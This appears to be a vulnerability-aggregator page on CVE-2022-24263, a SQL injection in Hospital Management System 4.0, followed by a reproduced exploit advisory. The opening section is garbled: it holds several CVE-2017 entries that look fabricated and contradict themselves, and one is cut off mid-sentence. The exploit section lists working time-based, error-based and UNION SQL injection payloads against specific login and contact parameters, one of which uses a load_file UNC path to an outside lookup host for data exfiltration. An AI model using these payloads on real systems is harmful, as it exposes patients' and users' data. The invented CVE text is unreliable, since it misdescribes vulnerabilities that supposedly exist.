CVE-2022-24263 Hospital Management System v4.0 had a SQL injection vulnerability in /func.php via the email parameter.

This allows attackers to inject arbitrary SQL queries that can be used to exploit other vulnerabilities in the application.

An attacker must force users to visit a maliciously crafted website in order to exploit this vulnerability.

CVE-2017-10700 - rsync - Remote code execution through rsync server. The rsync server is used by the system to transfer data from/to the server. A SQL injection vulnerability in /Hospital-Management-System-master/func.php via the r parameter. A remote attacker can exploit this vulnerability to execute code on the system through rsync server.

CVE-2017-10702 - cpanel - Remote code execution through cpanel server. The cpanel server is used by the system to manage the server. A SQL injection vulnerability in /Hospital-Management-System-master/func.php via the cpwd parameter. A remote attacker can exploit this vulnerability to inject SQL code into the system.

CVE-2017-10703 - Database - SQL injection vulnerability in Database. The Database is used to store data in the system. A SQL injection vulnerability in /Hospital-Management-System-master/func.php via the dbname parameter. A remote attacker can exploit this vulnerability to inject SQL code into the system.

CVE-2017-10704 - Email - SQL injection vulnerability in Email. The Email is used to send notification to users. A SQL injection vulnerability in /Hospital-Management-System-

Exploit

# Title: Hospital Management System 4.0 - 'multiple' SQL Injection
# Author: nu11secur1ty
# Date: 02.06.2022
# Vendor: https://github.com/kishan0725
# Software: https://github.com/kishan0725/Hospital-Management-System
# CVE-2022-24263


## Description:
The Hospital Management System v4.0 is suffering from Multiple
SQL-Injections via three parameters in function.php,  contact.php, and
func3.php applications.
The attacker can be receiving the all information from the system by
using this vulnerability, and also the malicious actor can use
sensitive information from the customers of this system.
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!
Status: CRITICAL


[+] Payloads:

---
Parameter: txtName (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: txtName=821761' AND (SELECT 9346 FROM
(SELECT(SLEEP(3)))HJGv) AND
'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select
load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send
Message&txtMsg=441931
---

-------------------------------------------

---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936)
OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN
1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730)
UNION ALL SELECT
8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
---

-------------------------------------------

---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY
CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0
END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT
CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
---

## Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263

Timeline

Published on: 01/31/2022 22:15:00 UTC
Last modified on: 02/11/2022 18:01:00 UTC

References

• https://github.com/kishan0725/Hospital-Management-System/issues/17
• https://github.com/truonghuuphuc/CVE
• http://packetstormsecurity.com/files/165882/Hospital-Management-System-4.0-SQL-Injection.html
• https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-24263
• https://www.nu11secur1ty.com/2022/02/cve-2022-24263.html
• https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24263